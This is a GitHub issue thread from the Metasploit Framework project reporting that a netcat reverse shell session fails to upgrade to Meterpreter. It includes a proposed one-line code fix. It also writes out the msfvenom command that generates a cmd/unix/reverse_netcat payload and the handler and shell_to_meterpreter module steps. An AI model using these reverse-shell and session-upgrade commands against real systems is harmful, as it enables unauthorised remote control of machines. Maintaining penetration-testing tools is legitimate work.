### ISSUE TITLE
Upgrading unix shell to meterpreter

### ISSUE THREAD

**Issue by AlanFoster** [rapid7/metasploit-framework#15004]
## Steps to reproduce

How'd you do it?

Create a netcat payload:

```
bundle exec ./msfvenom -p cmd/unix/reverse_netcat lhost=x.x.x.x lport=4444 R
```

Create a listener and run the payload on the target:
```
use multi/handler
set payload cmd/unix/reverse_netcat
set lhost x.x.x.x
run
```

After a shell opens, attempt to upgrade it:

```
use multi/manage/shell_to_meterpreter
set session 1
set lhost x.x.x.x
run
```

The prompt hangs for a bit, with verbose mode enabled all that's given to the user is:
```
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Upgrade payload: 
[-] Shells on the target platform, unix, cannot be upgraded to Meterpreter at this time.
[*] Post module execution completed
```

## Solution

I had a quick poke, and it seems like it's this added code that causes it to break:

https://github.com/rapid7/metasploit-framework/commit/93a133d5de2b7546cf5b0e98ee18faed87416e43#diff-d173cbcdf8260e163d18837d5154c57e0646ad954187bce96fae8e78105cc67f

Removing the extra code and swapping back:

```diff
- shell_read_until_token(token, @shell_token_index, timeout)
+ shell_read_until_token(token, 0, timeout)
```

Allows an upgrade to work as expected:
```
[2] pry(#<Msf::Sessions::CommandShell>)> continue
[*] Meterpreter session 2 opened (10.11.12.2:4433 -> 10.10.52.46:47204) at 2021-04-05 12:31:09 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Cleaning up handler
[*] Post module execution completed

```

It would require a few more cycles to see what the old code was doing and add tests for this scenario. From what I understand, it's executing the same code twice with differently formatted tokens - which is unexpected to me. The second call relies on `@shell_token_index` being set

## Expected behavior

Meterpreter

## Current behavior

No Meterpreter

### Metasploit version

```
msf6 post(multi/manage/shell_to_meterpreter) > version
Framework: 6.0.38-dev-7020b983cf
Console  : 6.0.38-dev-7020b983cf
```

**Comment by AlanFoster** [comment]
Closing as it wasn't possible to recreate recently against a recent target; Will keep an eye on it

**Comment by pkyria14** [comment]
i have the same issue still.
